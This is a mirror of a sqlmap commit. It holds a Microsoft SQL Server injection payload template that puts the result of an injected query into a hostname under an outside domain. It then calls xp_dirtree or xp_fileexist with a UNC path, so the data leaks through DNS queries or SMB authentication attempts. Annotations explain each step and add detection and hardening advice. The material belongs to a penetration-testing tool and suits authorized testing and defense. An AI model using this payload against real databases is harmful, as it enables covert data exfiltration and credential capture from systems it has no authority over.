mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-05-10 10:43:44 +03:00
Modified the xp_dirtree and xp_cmdshell UNC paths to use forward slashes instead of backslashes, and removed the space between the procedure name and quoted path. These changes help to avoid escaping/encoding issues, for example when using JSON. MSSQL still handles it the same way and will cause a DNS query or SMB authentication attempt.
# Template for a DNS-based out-of-band request on Microsoft SQL Server.
# %PREFIX%, %QUERY%, %SUFFIX%, %DOMAIN% and %RANDSTR1% are placeholders;
# presumably the tool substitutes them before the batch is sent (confirm against the loader).
# @host holds the hostname that the later UNC path points at.
DECLARE @host varchar(1024);
# Build the hostname: the result of %QUERY% is concatenated between the
# %PREFIX% and %SUFFIX% labels, under %DOMAIN%. String '+' requires %QUERY%
# to yield a character value (assumed; the cast is not visible here).
SELECT @host='%PREFIX%.'+(%QUERY%)+'.%SUFFIX%.%DOMAIN%';
# Call xp_dirtree with a UNC path on @host. Per the change description, the
# server then issues a DNS query or an SMB authentication attempt for that host.
# Forward slashes and no space before the quoted path avoid escaping/encoding
# issues (e.g. inside JSON); MSSQL handles the path the same way.
# Detection/hardening: alert on xp_dirtree / xp_fileexist calls with UNC
# arguments and on outbound DNS or SMB from database hosts; revoke EXECUTE on
# these procedures from low-privileged roles and block egress SMB.
EXEC('master..xp_dirtree"//'+@host+'/%RANDSTR1%"')
# or EXEC('master..xp_fileexist"//'+@host+'/%RANDSTR1%"')